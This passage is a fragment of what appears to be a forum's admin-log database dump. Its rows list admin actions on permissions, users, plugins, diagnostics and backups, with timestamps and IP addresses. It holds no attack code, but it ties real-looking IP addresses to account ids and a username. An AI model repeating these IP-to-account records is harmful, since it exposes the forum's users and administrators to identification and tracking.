(250, 1, 1420396637, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (251, 1, 1420396640, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (252, 1, 1420396657, 'forumpermission.php', 'edit', 'forumpermission id = 54', '46.146.211.11'), (253, 1, 1420396660, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (254, 1, 1420396662, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (255, 1, 1420396664, 'forumpermission.php', 'edit', 'forumpermission id = 55', '46.146.211.11'), (256, 1, 1420396666, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (257, 1, 1420396667, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (258, 1, 1420396670, 'forumpermission.php', 'quickset', 'forum id = 19', '46.146.211.11'), (259, 1, 1420396671, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (260, 1, 1420396701, 'forumpermission.php', 'quickedit', '', '46.146.211.11'), (261, 1, 1420396765, 'forumpermission.php', 'doquickedit', '', '46.146.211.11'), (262, 1, 1420396766, 'forumpermission.php', 'modify', '', '46.146.211.11'), (263, 1, 1420396801, 'forumpermission.php', 'edit', 'forum id = 19 / usergroup id = 1', '46.146.211.11'), (264, 1, 1420396805, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (265, 1, 1420396806, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (266, 1, 1420396819, 'forumpermission.php', 'edit', 'forum id = 19 / usergroup id = 8', '46.146.211.11'), (267, 1, 1420396825, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (268, 1, 1420396829, 'forumpermission.php', 'edit', 'forum id = 1 / usergroup id = 1', '46.146.211.11'), (269, 1, 1420396833, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (270, 1, 1420396834, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (271, 1, 1420396838, 'forumpermission.php', 'edit', 'forum id = 17 / usergroup id = 1', '46.146.211.11'), (272, 1, 1420396842, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (273, 1, 1420396843, 'forumpermission.php', 'modify', 'forum id = 17', '46.146.211.11'), (274, 1, 1420396847, 'forumpermission.php', 'edit', 'forum id = 6 / usergroup id = 1', '46.146.211.11'), (275, 1, 1420396851, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (276, 1, 1420396852, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'), (277, 1, 1420396857, 'forumpermission.php', 'edit', 'forum id = 11 / usergroup id = 1', '46.146.211.11'), (278, 1, 1420396860, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (279, 1, 1420396861, 'forumpermission.php', 'modify', 'forum id = 11', '46.146.211.11'), (280, 1, 1420396866, 'forumpermission.php', 'edit', 'forum id = 14 / usergroup id = 1', '46.146.211.11'), (281, 1, 1420396869, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (282, 1, 1420396871, 'forumpermission.php', 'modify', 'forum id = 14', '46.146.211.11'), (283, 1, 1420398674, 'forum.php', 'modify', '', '46.146.211.11'), (284, 1, 1420398723, 'forum.php', 'doorder', '', '46.146.211.11'), (285, 1, 1420398726, 'forum.php', 'modify', '', '46.146.211.11'), (286, 1, 1420398759, 'forum.php', 'doorder', '', '46.146.211.11'), (287, 1, 1420398765, 'forum.php', 'modify', '', '46.146.211.11'), (288, 1, 1420398777, 'forum.php', 'doorder', '', '46.146.211.11'), (289, 1, 1420398781, 'forum.php', 'modify', '', '46.146.211.11'), (290, 1, 1420399450, 'template.php', 'modify', '', '46.146.211.11'), (291, 1, 1420399454, 'template.php', 'addstyle', '', '46.146.211.11'), (292, 1, 1420399456, 'template.php', 'files', '', '46.146.211.11'), (293, 1, 1420399498, 'template.php', 'upload', '', '46.146.211.11'), (294, 1, 1420399499, 'template.php', 'rebuild', '', '46.146.211.11'), (295, 1, 1420399500, 'template.php', '', '', '46.146.211.11'), (296, 1, 1420399515, 'options.php', '', '', '46.146.211.11'), (297, 1, 1420399518, 'options.php', 'options', '', '46.146.211.11'), (298, 1, 1420399528, 'options.php', 'dooptions', '', '46.146.211.11'), (299, 1, 1420399535, 'options.php', 'options', '', '46.146.211.11'), (300, 1, 1420399709, 'template.php', 'modify', '', '46.146.211.11'), (301, 1, 1420399712, 'template.php', 'dodisplayorder', '', '46.146.211.11'), (302, 1, 1420399714, 'template.php', 'modify', '', '46.146.211.11'), (303, 1, 1420399716, 'template.php', 'modify', '', '46.146.211.11'), (304, 1, 1420399720, 'template.php', 'modify', '', '46.146.211.11'), (305, 1, 1420399722, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (306, 1, 1420399737, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (307, 1, 1420399746, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (308, 1, 1420399785, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (309, 1, 1420399788, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (310, 1, 1420399804, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (311, 1, 1420399805, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (312, 1, 1420399820, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (313, 1, 1420399825, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (314, 1, 1420399833, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (315, 1, 1420399840, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (316, 1, 1420399845, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (317, 1, 1420399850, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (318, 1, 1420399856, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (319, 1, 1420399868, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (320, 1, 1420401520, 'template.php', 'modify', '', '46.146.211.11'), (321, 1, 1420401525, 'template.php', 'modify', '', '46.146.211.11'), (322, 1, 1420404355, 'template.php', 'modify', '', '46.146.211.11'), (323, 1, 1420404357, 'css.php', 'edit', 'style id = 1', '46.146.211.11'), (324, 1, 1420404399, 'template.php', 'modify', '', '46.146.211.11'), (325, 1, 1420404401, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (326, 1, 1420404411, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (327, 1, 1420404417, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (328, 1, 1420404436, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (329, 1, 1420404437, 'template.php', 'modify', '', '46.146.211.11'), (330, 1, 1420404465, 'css.php', 'update', 'style id = 2', '46.146.211.11'), (331, 1, 1420404467, 'css.php', 'edit', 'style id = 2', '46.146.211.11'), (332, 1, 1420473370, 'options.php', '', '', '46.146.211.11'), (333, 1, 1420473375, 'options.php', 'options', '', '46.146.211.11'), (334, 1, 1420473452, 'options.php', 'dooptions', '', '46.146.211.11'), (335, 1, 1420473455, 'options.php', 'dooptions', '', '46.146.211.11'), (336, 1, 1420473459, 'options.php', 'dooptions', '', '46.146.211.11'), (337, 1, 1420473470, 'options.php', 'options', '', '46.146.211.11'), (338, 1, 1420474239, 'user.php', 'add', '', '46.146.211.11'), (339, 1, 1420474240, 'user.php', 'add', '', '46.146.211.11'), (340, 1, 1420474281, 'user.php', 'update', '', '46.146.211.11'), (341, 1, 1420474283, 'user.php', 'modify', 'user id = 102', '46.146.211.11'), (342, 1, 1420478989, 'user.php', 'add', '', '46.146.211.11'), (343, 1, 1420478994, 'options.php', '', '', '46.146.211.11'), (344, 1, 1420478998, 'options.php', 'options', '', '46.146.211.11'), (345, 1, 1420479016, 'options.php', 'dooptions', '', '46.146.211.11'), (346, 1, 1420479018, 'options.php', 'options', '', '46.146.211.11'), (347, 1, 1420480067, 'options.php', 'dooptions', '', '46.146.211.11'), (348, 1, 1420480068, 'options.php', '', '', '46.146.211.11'), (349, 1, 1420480072, 'options.php', 'options', '', '46.146.211.11'), (350, 1, 1420480077, 'options.php', 'dooptions', '', '46.146.211.11'), (351, 1, 1420480079, 'options.php', 'options', '', '46.146.211.11'), (352, 1, 1420480780, 'user.php', 'add', '', '46.146.211.11'), (353, 1, 1420480793, 'user.php', 'update', '', '46.146.211.11'), (354, 1, 1420480794, 'user.php', 'update', '', '46.146.211.11'), (355, 1, 1420480805, 'user.php', 'add', '', '46.146.211.11'), (356, 1, 1420480850, 'user.php', 'add', '', '46.146.211.11'), (357, 1, 1420480884, 'user.php', 'add', '', '46.146.211.11'), (358, 1, 1420480899, 'user.php', 'update', '', '46.146.211.11'), (359, 1, 1420480901, 'user.php', 'modify', 'user id = 115', '46.146.211.11'), (360, 1, 1420481213, 'user.php', 'add', '', '46.146.211.11'), (361, 1, 1420481229, 'user.php', 'update', '', '46.146.211.11'), (362, 1, 1420481231, 'user.php', 'modify', 'user id = 116', '46.146.211.11'), (363, 29, 1420482663, 'forum.php', 'modify', '', '93.228.158.124'), (364, 29, 1420482663, 'forum.php', 'modify', '', '93.228.158.124'), (365, 29, 1420482668, 'banning.php', 'banuser', '', '93.228.158.124'), (366, 29, 1420482669, 'user.php', 'find', '', '93.228.158.124'), (367, 29, 1420482671, 'user.php', 'findnames', '', '93.228.158.124'), (368, 1, 1420484491, 'user.php', 'add', '', '46.146.211.11'), (369, 1, 1420484508, 'user.php', 'modify', '', '46.146.211.11'), (370, 1, 1420484512, 'user.php', 'find', '', '46.146.211.11'), (371, 1, 1420484514, 'user.php', 'modify', '', '46.146.211.11'), (372, 1, 1420484517, 'user.php', 'add', '', '46.146.211.11'), (373, 1, 1420484540, 'user.php', 'update', '', '46.146.211.11'), (374, 1, 1420484542, 'user.php', 'modify', 'user id = 117', '46.146.211.11'), (375, 1, 1420647856, 'options.php', '', '', '46.146.211.11'), (376, 1, 1420647859, 'options.php', '', '', '46.146.211.11'), (377, 1, 1420647865, 'options.php', 'options', '', '46.146.211.11'), (378, 1, 1420647870, 'options.php', 'dooptions', '', '46.146.211.11'), (379, 1, 1420647963, 'options.php', 'options', '', '46.146.211.11'), (380, 1, 1420648829, 'options.php', '', '', '46.146.211.11'), (381, 1, 1420648832, 'options.php', '', '', '46.146.211.11'), (382, 1, 1420648841, 'options.php', 'options', '', '46.146.211.11'), (383, 1, 1420648846, 'options.php', 'dooptions', '', '46.146.211.11'), (384, 1, 1420648847, 'options.php', 'options', '', '46.146.211.11'), (385, 1, 1421049839, 'user.php', 'add', '', '46.146.211.11'), (386, 1, 1421049856, 'user.php', 'update', '', '46.146.211.11'), (387, 1, 1421049858, 'user.php', 'modify', 'user id = 132', '46.146.211.11'), (388, 1, 1421077996, 'user.php', 'modify', '', '46.146.211.11'), (389, 1, 1421077999, 'user.php', 'find', '', '46.146.211.11'), (390, 1, 1421078055, 'user.php', 'add', '', '46.146.211.11'), (391, 1, 1421078070, 'user.php', 'update', '', '46.146.211.11'), (392, 1, 1421078071, 'user.php', 'modify', 'user id = 133', '46.146.211.11'), (393, 1, 1421149276, 'user.php', 'add', '', '46.146.211.11'), (394, 1, 1421149343, 'user.php', 'add', '', '46.146.211.11'), (395, 1, 1421149418, 'user.php', 'find', '', '46.146.211.11'), (396, 1, 1421149423, 'user.php', 'modify', '', '46.146.211.11'), (397, 1, 1421149434, 'user.php', 'add', '', '46.146.211.11'), (398, 1, 1421149451, 'user.php', 'add', '', '46.146.211.11'), (399, 1, 1421149452, 'user.php', 'modify', '', '46.146.211.11'), (400, 1, 1421149452, 'user.php', 'modify', '', '46.146.211.11'), (401, 1, 1421149453, 'usertools.php', 'merge', '', '46.146.211.11'), (402, 1, 1421149454, 'user.php', 'modify', '', '46.146.211.11'), (403, 1, 1421149454, 'user.php', 'modify', '', '46.146.211.11'), (404, 1, 1421149488, 'user.php', 'modify', '', '46.146.211.11'), (405, 1, 1421149515, 'user.php', 'find', '', '46.146.211.11'), (406, 1, 1421149516, 'user.php', 'modify', '', '46.146.211.11'), (407, 1, 1421149519, 'user.php', 'modify', '', '46.146.211.11'), (408, 1, 1421149526, 'forum.php', 'modify', '', '46.146.211.11'), (409, 1, 1421149534, 'moderator.php', 'add', 'forum id = 11', '46.146.211.11'), (410, 1, 1421149544, 'moderator.php', 'update', 'forum id = 11', '46.146.211.11'), (411, 1, 1421149547, 'moderator.php', 'add', 'forum id = 11', '46.146.211.11'), (412, 1, 1421149548, 'forum.php', 'modify', '', '46.146.211.11'), (413, 1, 1421149549, 'forum.php', 'add', '', '46.146.211.11'), (414, 1, 1421149550, 'forumpermission.php', 'modify', '', '46.146.211.11'), (415, 1, 1421149554, 'banning.php', 'banuser', '', '46.146.211.11'), (416, 1, 1421149556, 'usertools.php', 'merge', '', '46.146.211.11'), (417, 1, 1421149559, 'user.php', 'modify', '', '46.146.211.11'), (418, 1, 1421149581, 'forum.php', 'modify', '', '46.146.211.11'), (419, 1, 1421149924, 'backup.php', 'choose', '', '46.146.211.11'), (420, 1, 1421150165, 'user.php', 'add', '', '46.146.211.11'), (421, 1, 1421150196, 'user.php', 'add', '', '46.146.211.11'), (422, 1, 1421150207, 'user.php', 'modify', '', '46.146.211.11'), (423, 1, 1421150212, 'user.php', 'add', '', '46.146.211.11'), (424, 1, 1421150212, 'user.php', 'modify', '', '46.146.211.11'), (425, 1, 1421150700, 'user.php', 'add', '', '46.146.211.11'), (426, 1, 1421150716, 'user.php', 'update', '', '46.146.211.11'), (427, 1, 1421150717, 'user.php', 'modify', 'user id = 134', '46.146.211.11'), (428, 1, 1421156397, 'user.php', 'add', '', '46.146.211.11'), (429, 1, 1421156405, 'user.php', 'update', '', '46.146.211.11'), (430, 1, 1421156407, 'user.php', 'modify', 'user id = 135', '46.146.211.11'), (431, 1, 1421157372, 'user.php', 'edit', 'user id = 11', '46.146.211.11'), (432, 1, 1421680414, 'options.php', '', '', '46.146.211.11'), (433, 1, 1421680417, 'options.php', 'options', '', '46.146.211.11'), (434, 1, 1421680443, 'options.php', 'options', '', '46.146.211.11'), (435, 1, 1421680449, 'options.php', 'dooptions', '', '46.146.211.11'), (436, 1, 1421680451, 'options.php', 'options', '', '46.146.211.11'), (437, 1, 1421680557, 'options.php', 'options', '', '46.146.211.11'), (438, 1, 1421681300, 'options.php', '', '', '46.146.211.11'), (439, 1, 1421681313, 'options.php', 'options', '', '46.146.211.11'), (440, 1, 1421681321, 'options.php', 'dooptions', '', '46.146.211.11'), (441, 1, 1421681322, 'options.php', 'options', '', '46.146.211.11'), (442, 1, 1421681341, 'options.php', 'dooptions', '', '46.146.211.11'), (443, 1, 1421681343, 'options.php', 'options', '', '46.146.211.11'), (444, 1, 1421687499, 'template.php', 'findupdates', '', '46.146.211.11'), (445, 1, 1421687536, 'plugin.php', 'modify', '', '46.146.211.11'), (446, 1, 1421687543, 'options.php', 'options', '', '46.146.211.11'), (447, 1, 1421687548, 'options.php', 'dooptions', '', '46.146.211.11'), (448, 1, 1421687549, 'options.php', 'options', '', '46.146.211.11'), (449, 1, 1421687553, 'plugin.php', 'modify', '', '46.146.211.11'), (450, 1, 1421687557, 'plugin.php', 'add', '', '46.146.211.11'), (451, 1, 1421687574, 'plugin.php', 'add', '', '46.146.211.11'), (452, 1, 1421687887, 'plugin.php', 'modify', '', '46.146.211.11'), (453, 1, 1421687893, 'plugin.php', 'modify', '', '46.146.211.11'), (454, 1, 1421687896, 'plugin.php', 'product', '', '46.146.211.11'), (455, 1, 1421687931, 'plugin.php', 'files', '', '46.146.211.11'), (456, 1, 1421687934, 'plugin.php', 'files', '', '46.146.211.11'), (457, 1, 1421688087, 'plugin.php', 'product', '', '46.146.211.11'), (458, 1, 1421688096, 'plugin.php', 'files', '', '46.146.211.11'), (459, 1, 1421688097, 'plugin.php', 'files', '', '46.146.211.11'), (460, 1, 1421688176, 'plugin.php', 'product', '', '46.146.211.11'), (461, 1, 1421688182, 'plugin.php', 'productadd', '', '46.146.211.11'), (462, 1, 1421688206, 'plugin.php', 'product', '', '46.146.211.11'), (463, 1, 1421688217, 'plugin.php', 'files', '', '46.146.211.11'), (464, 1, 1421688219, 'plugin.php', 'files', '', '46.146.211.11'), (465, 1, 1421688240, 'plugin.php', 'files', '', '46.146.211.11'), (466, 1, 1421688247, 'plugin.php', 'files', '', '46.146.211.11'), (467, 1, 1421688259, 'plugin.php', 'files', '', '46.146.211.11'), (468, 1, 1421688265, 'plugin.php', 'doimport', '', '46.146.211.11'), (469, 1, 1421688268, 'plugin.php', 'files', '', '46.146.211.11'), (470, 1, 1421688290, 'plugin.php', 'modify', '', '46.146.211.11'), (471, 1, 1421688297, 'plugin.php', 'product', '', '46.146.211.11'), (472, 1, 1421688304, 'plugin.php', 'files', '', '46.146.211.11'), (473, 1, 1421688321, 'plugin.php', 'product', '', '46.146.211.11'), (474, 1, 1421923992, 'plugin.php', 'files', '', '46.146.211.11'), (475, 1, 1421924558, 'plugin.php', 'files', '', '46.146.211.11'), (476, 1, 1421924583, 'plugin.php', 'doimport', '', '46.146.211.11'), (477, 1, 1421924591, 'plugin.php', 'files', '', '46.146.211.11'), (478, 1, 1421924594, 'plugin.php', 'product', '', '46.146.211.11'), (479, 1, 1421924597, 'plugin.php', 'productadd', '', '46.146.211.11'), (480, 1, 1421924605, 'plugin.php', 'productimport', '', '46.146.211.11'), (481, 1, 1421924608, 'plugin.php', 'product', '', '46.146.211.11'), (482, 1, 1421924609, 'plugin.php', 'product', '', '46.146.211.11'), (483, 1, 1421924614, 'plugin.php', 'productedit', '', '46.146.211.11'), (484, 1, 1421924719, 'plugin.php', 'product', '', '46.146.211.11'), (485, 1, 1421924768, 'plugin.php', 'productedit', '', '46.146.211.11'), (486, 1, 1421924806, 'plugin.php', 'productcode', '', '46.146.211.11'), (487, 1, 1421924807, 'plugin.php', 'productedit', '', '46.146.211.11'), (488, 1, 1421932923, 'user.php', 'add', '', '46.146.211.11'), (489, 1, 1421932930, 'user.php', 'modify', '', '46.146.211.11'), (490, 1, 1421932935, 'user.php', 'find', '', '46.146.211.11'), (491, 1, 1421932935, 'user.php', 'edit', '', '46.146.211.11'), (492, 1, 1421932954, 'user.php', 'update', '', '46.146.211.11'), (493, 1, 1421933394, 'user.php', 'modify', '', '46.146.211.11'), (494, 1, 1421933397, 'user.php', 'find', '', '46.146.211.11'), (495, 1, 1421933416, 'user.php', 'modify', '', '46.146.211.11'), (496, 1, 1421933418, 'user.php', 'find', '', '46.146.211.11'), (497, 1, 1421933421, 'user.php', 'find', '', '46.146.211.11'), (498, 1, 1421933424, 'user.php', 'find', '', '46.146.211.11'), (499, 1, 1421933428, 'user.php', 'find', '', '46.146.211.11'), (500, 1, 1421933430, 'user.php', 'find', '', '46.146.211.11'), (501, 1, 1421933434, 'user.php', 'edit', '', '46.146.211.11'), (502, 1, 1421933440, 'user.php', 'modify', '', '46.146.211.11'), (503, 1, 1421933440, 'user.php', 'modify', '', '46.146.211.11'), (504, 1, 1421933446, 'user.php', 'find', '', '46.146.211.11'), (505, 1, 1421933446, 'user.php', 'edit', '', '46.146.211.11'), (506, 1, 1421933452, 'user.php', 'modify', '', '46.146.211.11'), (507, 1, 1421933452, 'user.php', 'modify', '', '46.146.211.11'), (508, 1, 1421933453, 'user.php', 'find', '', '46.146.211.11'), (509, 1, 1421933456, 'user.php', 'edit', '', '46.146.211.11'), (510, 1, 1421933461, 'user.php', 'modify', '', '46.146.211.11'), (511, 1, 1421933464, 'user.php', 'find', '', '46.146.211.11'), (512, 1, 1421933531, 'user.php', 'edit', '', '46.146.211.11'), (513, 1, 1421933696, 'user.php', 'modify', '', '46.146.211.11'), (514, 1, 1421933698, 'user.php', 'find', '', '46.146.211.11'), (515, 1, 1421933701, 'user.php', 'edit', '', '46.146.211.11'), (516, 1, 1421933730, 'user.php', 'modify', '', '46.146.211.11'), (517, 1, 1421933732, 'user.php', 'find', '', '46.146.211.11'), (518, 1, 1421933765, 'user.php', 'modify', '', '46.146.211.11'), (519, 1, 1421933767, 'user.php', 'find', '', '46.146.211.11'), (520, 1, 1421933769, 'user.php', 'edit', '', '46.146.211.11'), (521, 1, 1421933783, 'user.php', 'update', '', '46.146.211.11'), (522, 1, 1421933787, 'user.php', 'edit', 'user id = 34', '46.146.211.11'), (523, 1, 1421933795, 'user.php', 'update', 'user id = 34', '46.146.211.11'), (524, 1, 1421933797, 'user.php', 'modify', 'user id = 34', '46.146.211.11'), (525, 1, 1421933827, 'user.php', 'find', '', '46.146.211.11'), (526, 1, 1422122358, 'user.php', 'add', '', '46.146.211.11'), (527, 1, 1422122370, 'user.php', 'modify', '', '46.146.211.11'), (528, 1, 1422122374, 'user.php', 'find', '', '46.146.211.11'), (529, 1, 1422122374, 'user.php', 'edit', 'user id = 1', '46.146.211.11'), (530, 1, 1422122378, 'user.php', 'modify', '', '46.146.211.11'), (531, 1, 1422122413, 'user.php', 'find', '', '46.146.211.11'), (532, 1, 1422122414, 'user.php', 'edit', '', '46.146.211.11'), (533, 1, 1422122416, 'user.php', 'modify', '', '46.146.211.11'), (534, 1, 1422122422, 'user.php', 'find', '', '46.146.211.11'), (535, 1, 1422122433, 'user.php', 'find', '', '46.146.211.11'), (536, 1, 1422122441, 'user.php', 'find', '', '46.146.211.11'), (537, 1, 1422122446, 'user.php', 'find', '', '46.146.211.11'), (538, 1, 1422122449, 'user.php', 'edit', '', '46.146.211.11'), (539, 1, 1422122460, 'user.php', 'update', '', '46.146.211.11'), (540, 1, 1422122463, 'user.php', 'edit', '', '46.146.211.11'), (541, 1, 1422122470, 'user.php', 'modify', '', '46.146.211.11'), (542, 1, 1422122476, 'user.php', 'find', '', '46.146.211.11'), (543, 1, 1422122476, 'user.php', 'edit', '', '46.146.211.11'), (544, 1, 1422122479, 'user.php', 'modify', '', '46.146.211.11'), (545, 1, 1422122480, 'user.php', 'find', '', '46.146.211.11'), (546, 1, 1422122483, 'user.php', 'find', '', '46.146.211.11'), (547, 1, 1422122484, 'user.php', 'find', '', '46.146.211.11'), (548, 1, 1422122486, 'user.php', 'find', '', '46.146.211.11'), (549, 1, 1422122496, 'user.php', 'edit', '', '46.146.211.11'), (550, 1, 1422122507, 'user.php', 'find', '', '46.146.211.11'), (551, 1, 1422122507, 'user.php', 'edit', '', '46.146.211.11'), (552, 1, 1422122530, 'user.php', 'modify', '', '46.146.211.11'), (553, 1, 1422122534, 'user.php', 'find', '', '46.146.211.11'), (554, 1, 1422122535, 'user.php', 'edit', '', '46.146.211.11'), (555, 1, 1422122544, 'user.php', 'update', '', '46.146.211.11'), (556, 1, 1422122548, 'user.php', 'edit', 'user id = 29', '46.146.211.11'), (557, 1, 1422122561, 'user.php', 'update', 'user id = 29', '46.146.211.11'), (558, 1, 1422122563, 'user.php', 'modify', 'user id = 29', '46.146.211.11'), (559, 1, 1422122565, 'adminpermissions.php', 'edit', 'user id = 29 (yakuza112)', '46.146.211.11'), (560, 1, 1422122586, 'adminpermissions.php', 'update', 'user id = 29 (yakuza112) (0 » 491516)', '46.146.211.11'), (561, 1, 1422122587, 'adminpermissions.php', '', '', '46.146.211.11'), (562, 29, 1422122743, 'template.php', 'modify', '', '179.43.134.203'), (563, 29, 1422122754, 'template.php', 'findupdates', '', '179.43.134.203'), (564, 29, 1422122761, 'template.php', 'findupdates', '', '179.43.134.203'), (565, 29, 1422122771, 'plugin.php', 'product', '', '179.43.134.203'), (566, 29, 1422122781, 'plugin.php', 'modify', '', '179.43.134.203'), (567, 29, 1422122785, 'plugin.php', 'product', '', '179.43.134.203'), (568, 29, 1422122846, 'repair.php', 'list', '', '179.43.134.203'), (569, 29, 1422122848, 'diagnostic.php', 'list', '', '179.43.134.203'), (570, 29, 1422122903, 'diagnostic.php', 'server_modules', '', '179.43.134.203'), (571, 29, 1422122907, 'diagnostic.php', 'list', '', '179.43.134.203'), (572, 29, 1422122909, 'diagnostic.php', 'doversion', '', '179.43.134.203'), (573, 29, 1422122926, 'diagnostic.php', 'list', '', '179.43.134.203'), (574, 29, 1422122932, 'diagnostic.php', 'dosysinfo', '', '179.43.134.203'), (575, 29, 1422122996, 'diagnostic.php', 'list', '', '179.43.134.203'), (576, 29, 1422123091, 'stats.php', 'index', '', '179.43.134.203'), (577, 29, 1422123093, 'stats.php', 'top', '', '179.43.134.203'), (578, 29, 1422123101, 'rssposter.php', 'modify', '', '179.43.134.203'), (579, 29, 1422123105, 'image.php', 'modify', 'Avatars', '179.43.134.203'), (580, 29, 1422123117, 'user.php', 'modify', '', '179.43.134.203'), (581, 29, 1422123124, 'user.php', 'find', '', '179.43.134.203'), (582, 29, 1422123125, 'user.php', 'edit', '', '179.43.134.203'), (583, 29, 1422123129, 'user.php', 'modify', '', '179.43.134.203'), (584, 29, 1422123134, 'user.php', 'find', '', '179.43.134.203'), (585, 29, 1422123134, 'user.php', 'edit', '', '179.43.134.203'), (586, 29, 1422123139, 'user.php', 'modify', '', '179.43.134.203'), (587, 29, 1422123143, 'user.php', 'find', '', '179.43.134.203'), (588, 29, 1422123143, 'user.php', 'edit', '', '179.43.134.203'), (589, 29, 1422123145, 'user.php', 'modify', '', '179.43.134.203'), (590, 29, 1422123153, 'user.php', 'find', '', '179.43.134.203'), (591, 29, 1422123153, 'user.php', 'edit', '', '179.43.134.203'), (592, 29, 1422123167, 'user.php', 'edit', 'user id = 29', '179.43.134.203'), (593, 29, 1422123187, 'user.php', 'update', 'user id = 29', '179.43.134.203'), (594, 29, 1422123188, 'user.php', 'modify', 'user id = 29', '179.43.134.203'), (595, 29, 1422123211, 'usertools.php', 'doips', '', '179.43.134.203'), (596, 29, 1422123213, 'banning.php', 'modify', '', '179.43.134.203'), (597, 29, 1422123213, 'banning.php', 'modify', '', '179.43.134.203'), (598, 29, 1422123219, 'passwordcheck.php', '', '', '179.43.134.203'), (599, 29, 1422123224, 'passwordcheck.php', 'check', '', '179.43.134.203'), (600, 29, 1422123233, 'passwordcheck.php', 'check', '', '179.43.134.203'), (601, 29, 1422123245, 'notice.php', 'modify', '', '179.43.134.203'), (602, 29, 1422123247, 'announcement.php', 'modify', '', '179.43.134.203'), (603, 29, 1422123247, 'announcement.php', 'modify', '', '179.43.134.203'), (604, 29, 1422123250, 'forum.php', 'modify', '', '179.43.134.203'), (605, 29, 1422123265, 'cronadmin.php', 'modify', '', '179.43.134.203'), (606, 29, 1422123280, 'diagnostic.php', 'list', '', '179.43.134.203'), (607, 29, 1422123281, 'misc.php', 'chooser', '', '179.43.134.203'), (608, 29, 1422123285, 'backup.php', 'choose', '', '179.43.134.203'), (609, 29, 1422123286, 'backup.php', 'choose', '', '179.43.134.203'), (610, 29, 1422145262, 'plugin.php', 'product', '', '179.43.134.204'), (611, 29, 1422145265, 'options.php', '', '', '179.43.134.204'), (612, 29, 1422145269, 'options.php', 'options', '', '179.43.134.204'), (613, 29, 1422145278, 'options.php', '', '', '179.43.134.204'), (614, 29, 1422145290, 'options.php', 'options', '', '179.43.134.204'), (615, 29, 1422145299, 'subscriptions.php', 'modify', '', '179.43.134.204'), (616, 29, 1422145302, 'subscriptions.php', 'modify', '', '179.43.134.204'), (617, 29, 1422238891, 'user.php', 'add', '', '93.228.144.155'), (618, 29, 1422238916, 'user.php', 'update', '', '93.228.144.155'), (619, 29, 1422238918, 'user.php', 'modify', 'user id = 158', '93.228.144.155'), (620, 40, 1424956502, 'user.php', '', '', '85.105.178.242'), (621, 40, 1424956541, 'user.php', 'find', '', '85.105.178.242'), (622, 40, 1424956551, 'user.php', 'find', '', '85.105.178.242'), (623, 40, 1424956553, 'user.php', 'find', '', '85.105.178.242'), (624, 40, 1424956554, 'user.php', 'find', '', '85.105.178.242'), (625, 40, 1424956590, 'user.php', 'find', '', '85.105.178.242'), (626, 40, 1424956590, 'user.php', 'find', '', '85.105.178.242'), (627, 40, 1424956591, 'user.php', 'find', '', '85.105.178.242'), (628, 40, 1424956592, 'user.php', 'find', '', '85.105.178.242'), (629, 40, 1424956593, 'user.php', 'find', '', '85.105.178.242'), (630, 40, 1424956624, 'template.php', 'modify', '', '85.105.178.242'), (631, 40, 1424956632, 'options.php', '', '', '85.105.178.242'), (632, 40, 1424956647, 'notice.php', 'modify', '', '85.105.178.242'), (633, 40, 1424956650, 'notice.php', 'modify', '', '85.105.178.242'), (634, 40, 1424956653, 'announcement.php', 'modify', '', '85.105.178.242'), (635, 40, 1424956663, 'forum.php', 'modify', '', '85.105.178.242'), (636, 40, 1424956666, 'forum.php', 'edit', 'forum id = 19', '85.105.178.242'), (637, 40, 1424956691, 'user.php', 'modify', '', '85.105.178.242'), (638, 40, 1424956694, 'user.php', 'find', '', '85.105.178.242'), (639, 40, 1424956698, 'user.php', 'edit', 'user id = 1', '85.105.178.242'), (640, 40, 1424956744, 'user.php', 'update', 'user id = 1', '85.105.178.242'), (641, 40, 1424956745, 'user.php', 'modify', 'user id = 1', '85.105.178.242'), (642, 40, 1424956751, 'usergroup.php', 'modify', '', '85.105.178.242'), (643, 40, 1424956760, 'usergroup.php', 'edit', 'usergroup id = 6', '85.105.178.242'), (644, 40, 1424956777, 'user.php', 'find', '', '85.105.178.242'), (645, 40, 1424956783, 'user.php', 'find', '', '85.105.178.242'), (646, 40, 1424956868, 'options.php', '', '', '85.105.178.242'), (647, 40, 1424956883, 'user.php', 'moderate', '', '85.105.178.242'), (648, 1, 1424958365, 'options.php', '', '', '85.105.178.242'), (649, 1, 1424958370, 'options.php', 'options', '', '85.105.178.242'), (650, 1, 1424958395, 'options.php', 'dooptions', '', '85.105.178.242'), (651, 1, 1424958397, 'options.php', 'options', '', '85.105.178.242'), (652, 1, 1424958416, 'options.php', '', '', '85.105.178.242'), (653, 1, 1424958423, 'options.php', 'options', '', '85.105.178.242'), (654, 1, 1424958488, 'stats.php', 'index', '', '85.105.178.242'), (655, 1, 1424958488, 'stats.php', 'index', '', '85.105.178.242'), (656, 